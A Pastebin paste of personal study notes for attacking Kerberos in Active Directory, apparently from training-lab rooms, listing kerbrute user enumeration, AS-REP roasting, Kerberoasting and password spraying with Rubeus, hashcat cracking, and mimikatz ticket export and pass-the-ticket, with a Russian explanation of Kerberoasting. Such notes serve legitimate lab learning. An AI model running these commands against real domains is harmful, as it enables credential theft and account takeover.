Advertisement
alice_killer

kerberous

Feb 18th, 2023 (edited)
388
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Bash 3.49 KB | None | 0 0
  1. ./kerbrute userenum -d spookysec.local --dc 10.10.154.213 /home/shaka/users.txt #brute users
  2.  
  3.  
  4. the login was svc-admin
  5.  
  6. to check users for UF_DONT_REQUIRE_PREAUTH flag
  7. GetNPUsers.py -no-pass -usersfile validusers.txt -dc-ip 10.10.6.165 spookysec.local/
  8. Rubeus.exe kerberoast  #Kerberoasting with Rubeus
  9. Rubeus.exe asreproast #asreproast
  10.  
  11. to check one user
  12. GetNPUsers.py spookysec.local/svc-admin -no-pass
  13.  
  14. decrypt
  15. hashcat -m18200 hash.txt pass.txt
  16.  
  17. __________________
  18. brute Kerberos
  19. echo 10.10.167.222 CONTROLLER.local >> C:\Windows\System32\drivers\etc\hosts
  20. Rubeus.exe brute /password:Password1 /noticket   #TO BRUTE ALL USERS FOR A CERTAIN PASSWORD IN THIS CASE"Password1"
  21. -- Rubeus.exe harvest /interval:30 #TO harvest TGT(tickets) every 30 sec
  22. _______________________________
  23. mimikatz privelege escalation
  24. mimikatz.exe
  25. in mimikatz:
  26. privilege::debug #Убедитесь, что это выводит [выход '20' OK], если это не так, это означает, что у вас нет прав администратора для правильного запуска mimikatz.
  27. sekurlsa::tickets /export #это экспортирует все билеты .kirbi в каталог, в котором вы сейчас находитесь.
  28. kerberos::ptt <ticket> #запустите эту команду внутри mimikatz с билетом, который вы получили ранее. Он будет кэшировать и олицетворять данный билет.
  29. outside mimkatz:
  30. klist #to check if it went successfully  
  31.  
  32. '''Kerberoasting позволяет пользователю запрашивать служебный билет для любой службы с зарегистрированным именем участника-службы, а затем использовать этот билет для взлома пароля службы. Если служба имеет зарегистрированное имя участника-службы, она может быть стабильной по протоколу Kerbero, однако успех атаки зависит от того, насколько надежен пароль и отслеживается ли он, а также от привилегий взломанной учетной записи службы. Чтобы перечислить учетные записи Kerberoastable, я бы предложил такой инструмент, как BloodHound, чтобы найти все учетные записи Kerberoastable, он позволит вам увидеть, какие учетные записи вы можете использовать Kerberoastable, если они являются администраторами домена, и какие соединения они имеют с остальной частью домена. Это немного выходит за рамки этой комнаты, но это отличный инструмент для поиска целевых аккаунтов.
  33.  
  34. Чтобы выполнить атаку, мы будем использовать как Rubeus, так и Impacket, чтобы вы понимали различные инструменты для Kerberoasting. Существуют и другие инструменты, такие как kekeo и Invoke-Kerberoast, но я оставлю вас для самостоятельного изучения этих инструментов. '''
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement